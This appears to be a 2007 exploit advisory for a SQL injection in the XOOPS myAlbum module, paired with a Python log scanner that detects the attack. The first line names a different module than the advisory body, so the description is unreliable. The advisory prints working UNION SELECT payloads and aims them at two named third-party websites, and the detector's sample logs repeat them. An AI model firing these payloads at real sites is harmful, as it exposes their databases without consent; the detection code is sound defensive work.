The XOOPS module xhresim suffers from a remote SQL injection vulnerability.
4ee5e78d8336e0cbb47a3199026a493741286380cb90f7ea7377ec4b528a70e3
[~] XOOPS 1.0 RC 3.0.4 Module myAlbum - Remote SQL Injection
[~]
[~] www.xoops.org
[~] ----------------------------------------------------------
[~] Bug found by d3v1l
[~]
[~] Date: 20.09.2007
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com/forum.php )
[~]
[~]
[~]-------------------------------------------------------------
[~] Exploit :-
[~]
[~] http://site.com/modules/myalbum/viewcat.php?cid=SQL
[~]
[~] Demo :-
[~]
[~]
[~] http://amigaworld.net/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~] http://www.canelupocecoslovacco.info/modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/*
[~]----------------------------------------------------------------------------------------------------------------------
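
A detection check for the requests shown above, added here as an example and not part of the original advisory: it flags access-log entries for viewcat.php whose cid value is not a plain integer. The combined log format, the sample lines and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path and parameter name are taken from the advisory; the log format is assumed.
VULN_PATH = "/modules/myalbum/viewcat.php"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INT_RE = re.compile(r"\d{1,10}")  # a category id should be a short integer

def suspicious_cid(line):
    """Return the decoded cid if the request hits viewcat.php with a non-integer id."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.lower() != VULN_PATH:
        return None
    # parse_qs percent-decodes and maps '+' to space; repeated cid values are all checked.
    for v in parse_qs(url.query, keep_blank_values=True).get("cid", []):
        if not INT_RE.fullmatch(v):
            return v
    return None

def scan(lines):
    """Return (line_number, decoded_cid) for every flagged log line."""
    hits = []
    for n, line in enumerate(lines, 1):
        v = suspicious_cid(line)
        if v is not None:
            hits.append((n, v))
    return hits

# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Sep/2007:10:00:01 +0000] "GET /modules/myalbum/viewcat.php?cid=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [20/Sep/2007:10:00:09 +0000] "GET /modules/myalbum/viewcat.php?cid=1+UNION+SELECT+1,concat_ws(0x3a,version(),database(),user())/* HTTP/1.1" 200 4821',
    '192.0.2.77 - - [20/Sep/2007:10:00:12 +0000] "GET /modules/myalbum/viewcat.php?cid=1%20union%20select%201 HTTP/1.1" 200 4800',
    '192.0.2.10 - - [20/Sep/2007:10:00:15 +0000] "GET /modules/news/index.php?cid=abc HTTP/1.1" 200 100',
    '192.0.2.10 - - [20/Sep/2007:10:00:20 +0000] "GET /modules/myalbum/viewcat.php?cid=2&cid=2%27 HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(f"line {n}: non-integer cid {v!r}")
```

The same integer-only rule, applied to cid inside the module before the value reaches the query, closes the injection point rather than only detecting its use.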